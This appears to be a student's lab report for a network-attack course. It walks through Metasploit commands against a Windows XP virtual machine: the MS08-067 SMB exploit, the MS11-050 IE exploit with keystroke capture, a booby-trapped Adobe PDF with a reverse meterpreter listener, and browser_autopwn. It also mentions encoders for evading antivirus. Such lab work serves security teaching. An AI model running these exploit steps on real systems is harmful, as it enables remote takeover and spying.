20145227鄢曼君《网络对抗》MSF基础应用

20145227鄢曼君《网络对抗》MSF基础应用

主动攻击:ms08_067漏洞攻击实践

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。在VMware中设置两台虚拟机网络为NAT模式,让两台虚拟机ping通。
  • 在kali终端中开启msfconsole。
  • 输入命令search ms08_067,会显示出找到的渗透模块:

  • 输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。
  • 输入命令show payloads会显示出有效的攻击载荷,咱们找到一个shell_reverse_tcp。

  • 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
  • 输入命令set LHOST "kali Ip" set RHOST "Win xp Ip"

  • 使用命令show options查看payload状态。

  • 输入命令exploit开始攻击,攻击成功。

  • 在kali上执行ipconfig/all获得以下图所示:

  • 在win xp上执行一样的命令,以下图所示:

  • 能够发现两者结果相同,说明成功攻击。
  • 还能够进行MS08_067远程漏洞攻击实践:meterpreter
  • 前面都和上面的步骤相同。设置payload:set payload windows/meterpreter/reverse_tcp
  • 输入命令exploit开始攻击,攻击成功。

对浏览器攻击:MS11_050漏洞渗透攻击实践

  • 两台虚拟机相互ping通。
  • kali中开启msfconsole。因为此次作的是ms11_050漏洞攻击,输入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用该模块;info便可查看关于该漏洞的信息

  • 设置相关信息:

  • show options查看设置好的相关信息:

  • exploit,靶机访问的ip地址如图:

  • 在靶机IE上输入网址,并在靶机上查看信息。

  • 查看kali,显示一个session 1已经建立:

  • 输入命令sessions -i 1,开始链接:

  • 攻击成功。能够进行一些操做,好比获取shell

  • 或者进行按键抓取:

Adobe阅读器渗透攻击

  • kali下打开显示隐藏文件。
  • 在kali终端中开启msfconsole
  • 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。
  • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
  • 设置相关数据:

  • 使用命令show options,看是否设置成功。

  • 输入exploit,生成pdf文件,并能够看到pdf所在文件夹,将pdf复制到靶机里。

  • 使用back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
  • 使用set payload windows/meterpreter/reverse_tcp创建一个反向链接。注意的是,这里须要输入命令set LPORT 5227和攻击模块里的数据设置为同样的。
  • 使用命令exploit开始攻击,在xp中打开pdf。攻击成功结果以下图:

  • 将进程迁移到explorer.exe.使用ps查看当前进程,并找到explorer.exe的进程号,以下图所示:

  • 使用命令migrate 296 成功后输入shell,可查看xp靶机信息。还可进行一些操做。

  • 在靶机xp中使用命令netstat -an,看本地tcp链接。发现成功链接。

辅助模块应用:使用浏览器渗透攻击server/browser_autopwn 模块

  • browser_autopwn 是 Metasploit 提供的辅助功能模块。在用户访问 Web 页面时,它会自动攻击受害者的浏览器。在开始攻击以前,browser_autopwn 可以检测用户使用的浏览器类型,根据浏览器的检测结果,自行部署最合适的 exploit。
  • 这是针对浏览器程序自己的渗透攻击,主要利用浏览器自己的漏洞,如 IE 浏览器,常常因为自身安全漏洞致使攻击者可以构造恶意网页进行渗透攻击。
  • 打开终端窗口,启动msfconsole,选择 server/browser——autopwn 模块,配置 LHOST、 SRVHOST 为主控端 IP,设置 URIPATH 为 auto。最后运行run

  • 以后 metasploit 会自动生成利用浏览器自己的一些典型漏洞的网页,此处生成了 20 个。

  • 攻击成功。查看检测结果,能够看到kali向靶机发送了不少数据包,用于检测该漏洞是否能利用,实际上靶机是打开了不少个网页,访问了产生的20个页面。

  • 能够进行一些操做:

  • 或者执行ipconfig命令:

问题回答

用本身的话解释什么是exploit,payload,encode.

  • exploit就至关因而一个运载的工具,将负责攻击的代码传送到靶机中。
  • payload也就是负责攻击的代码,以前咱们实验就作过。
  • encode也就是编码,它主要有两个功能,一是为了不以前的payload中出现坏字符,二就是它要假装从而实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

实验体会

  • 此次实验最大的感觉就是电脑有一个大的内存条是多么重要。以前作的时候同时开两个虚拟机电脑卡的要死,作一夜只能作一点点,时间都浪费在等电脑反应上了。后面换了一个大的内存条,实验就很顺畅了。而后此次实验老师要求至少有一个和别人不同,我以为这点很是好,让咱们在作的过程当中能更多的去思考,而不是彻底照着别人的过一遍而不思考。还有一个感觉就是咱们此次实验攻击的靶机都是xp系统,漏洞都是很早以前的,要想攻击如今的电脑可就没有这么容易了。有点期待下一周的任务了,又会有什么不同的呢?
相关文章
相关标签/搜索